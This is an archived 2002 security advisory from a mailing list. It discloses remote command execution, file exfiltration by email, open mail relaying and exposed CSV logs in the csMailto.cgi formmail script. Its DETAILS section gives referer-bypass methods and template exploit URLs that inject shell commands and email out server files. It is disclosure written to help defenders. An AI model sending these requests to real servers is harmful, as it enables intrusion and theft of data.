[NEWS] csMailto.cgi - Remote Command Execution
From: support@securiteam.comDate: 04/26/02
- Previous message: support@securiteam.com: "[UNIX] Sudo Password Prompt Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 26 Apr 2002 08:53:16 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
csMailto.cgi - Remote Command Execution
------------------------------------------------------------------------
SUMMARY
<http://www.cgiscript.net/> csMailto is a Perl CGI Formmail script
developed by Mike Barone and Andy Angrick of CGIscript.net. From the
website "(csMailto is) an automated script that allows the user to build
and manage multiple mailto forms to use within your web site. Build your
own mailto forms without having to learn Perl. It also can send and
receive files!".
The script stores all its configuration data in hidden form fields,
relying on the user to accurately (and honestly) echo that information
back with each form submission. The only thing allowing a user from having
complete control over the script is a "referer" check that is easily
bypassed.
Because of this and other problems, the script is subject to the following
attacks:
- Execute commands on server.
- Execute command on server and mail output to anyone.
- Email server files to anyone.
- Downloading of logged form input (in CSV format).
- Use of form to send email to anyone.
DETAILS
Because the script stored all the form configuration data in hidden fields
in the actual form, once a user can bypass the referrer check they can
essentially do anything an administrator of the program could do, plus
some additional things that probably were not intended.
The script does not even check for the full referrer, it only checks for
the presence of the server hostname in the referral your send. For
example, if the script is http://host.com/cgi-script/CSMailto/CSMailto.cgi
then it will look for "host.com" in the "referer".
This method is inherently insecure and can be bypassed by:
- Creating a perl LWP script which could specify an arbitrary referrer.
- Using JavaScript or other means to modify the form values on the
generated CSMailto form and allowing the browser to send the original (and
valid) URL as a referrer.
- Creating a local form page with the target hostname in the path and
thus the referrer that is sent when in the form is submitted (e.g.
C:\html\host.com\form.html)
- Creating a local html page with a simple link (see below) and the
target hostname in the path and thus in the referrer that is sent when the
link is clicked (e.g. C:\html\host.com.html)
Some example exploits are as follows. Note, these all assume that the
referrer check was bypassed with one of the above methods.
- Execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- Execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&
Email=user@host.com&
form-autoresponse=YES&command=mailform
- Email server file to anyone
CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&
form-autoresponse=YES&command=mailform
- Download/access form input (no "referer" check) CSMailto has the option
to "have the feedback exported to an external file". These files are
stored in CSV format and can be downloaded from:
CSMailto/export/FORM_NAME.csv
Form HTML files are often named after their form names and the information
is also stored in hidden fields in the actual form like so
"...formname=FORM_NAME...". Also, it's worth noting that the script
doesn't properly escape '"', ',', or nextline ("\n") chars, so any CSV
data with those characters may become corrupted.
- Use form to send email to anyone
CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&
form-results=body&command=mailform
Another example of the seriousness of this problem, as mentioned above,
you can simply load an existing CSMailto form and have your browser (IE in
this example) change some of the preset hidden form values and then click
submit. Example:
- Email server file to anyone
javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
javascript:alert(document.forms[0]["Email"].value="user@host.com");
Impact:
Because of the high number of users who are using CGIscript.net scripts
(over 17,000 csSearch users alone according to the website) and the fact
that search engines can easily be used to identify sites with the unique
"csMailto.cgi" script name, the risk posed by these flaws is very high
indeed.
Solution:
Vendor was notified on Apr 5, 2002 of the problem but has not yet released
a fix.
Affected parties may want to consider switching to a free replacement such
as "nms formmail" which can be found at
<http://nms-cgi.sourceforge.net/scripts.shtml>
http://nms-cgi.sourceforge.net/scripts.shtml
ADDITIONAL INFORMATION
The information has been provided by <mailto:stegus1@yahoo.com> Steve
Gustin.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Sudo Password Prompt Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
